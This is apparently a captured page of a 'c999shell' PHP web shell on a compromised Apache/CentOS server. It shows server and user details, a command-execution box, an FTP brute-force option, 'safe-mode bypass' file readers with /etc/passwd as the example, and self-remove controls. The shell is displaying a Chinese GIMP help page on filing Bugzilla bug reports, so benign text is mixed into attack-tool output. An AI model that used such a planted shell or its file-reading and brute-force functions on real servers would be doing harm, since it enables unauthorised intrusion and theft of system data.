!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/gimp/2.0/help/zh_CN/   drwxr-xr-x
Free 50.9 GB of 127.8 GB (39.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     apbs02.html (8.79 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
2.  报告 Bug

2.  报告 Bug

好了,您进行了所有的确认工作,任然认为它可能是一个 Bug。您就应该直接进行 Bug 报告了,到 http://bugzilla.gnome.org/enter_bug.cgi,下来网页选取“GIMP”。

[注意] 注意

如果是第一次报告 Bug,要创建一个 Bugzilla 帐号。申请过程很简单,您也不会收到任何垃圾邮件。

现在可以进行 Bug 报告了,您需要填写下面的信息。要注意的是,您输入的信息如果有错,其后会被开发者修改,因此尽量正确填写,不过也不要过分在意。

Summary(摘要)

提供足够描述 Bug 的一句话摘要,这样其它人可以通过其中包含的单词搜索 Bug 报告。

Steps to reproduce the bug(再现 Bug 的步骤)

根据提示并尽量详细,包括所有您认为可能相关的信息。一个经典的最毫无用处的 Bug 报告就是“GIMP crashes. This program sucks”。如果您都无法告知是个什么问题的话,开发者要解决它是毫无希望的。如果可能,给出可靠地再现 Bug 的步骤和足够细节,这样任何人都可以根据它来再现该 Bug。

Component(组件)

在这里设置该 Bug 影响 GIMP 的部分。您需要在这里进行选择,不过如果无法确认是哪部分也没有关系,猜测一下。

Severity(严重程度)

大部分情况下这里要么设为“Normal”,要么设为“Enhancement”(如果是功能加强而不是错误)。维护者会在确认后调整严重程度。

Priority(优先级)

大多数情况下这里设为“Normal”,维护者可以调整它。将优先级设为“Immediate”或“Urgent”是让人恼火的。

Version(版本)

这里设置您使用的 GIMP 的版本,不必管 Gnome 版本,让它为“unspecified”。

Operating System(操作系统)

将这里设为您的 OS,除非您明确知道在所有操作系统中都有该 Bug。

其它的则可以忽略。所有都填完后,按下“Commit”按钮,这时报告就提交了。它会被给予一个号码,您可能要记下它;在有人对您的 Bug 报告评论或修改时,够会通过 Email 发送给您。也可以通过在 http://bugzilla.gnome.org 网页中下部的“Action:”区域输入 Bug 号码并按下“Find”按钮来获取您 Bug 报告的当前状态。

提交 Bug 报告时提供屏幕截图或其它类型数据有时也非常有用。可以到您 Bug 报告网页,点击“Creat a New Attachment”链结并根据指令。一般不要这么做除非您认为附件的必须的,并且尽可能控制文件大小。Bug 报告一般在系统中会存在多年,所以不要无意义地浪费空间。


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0159 ]--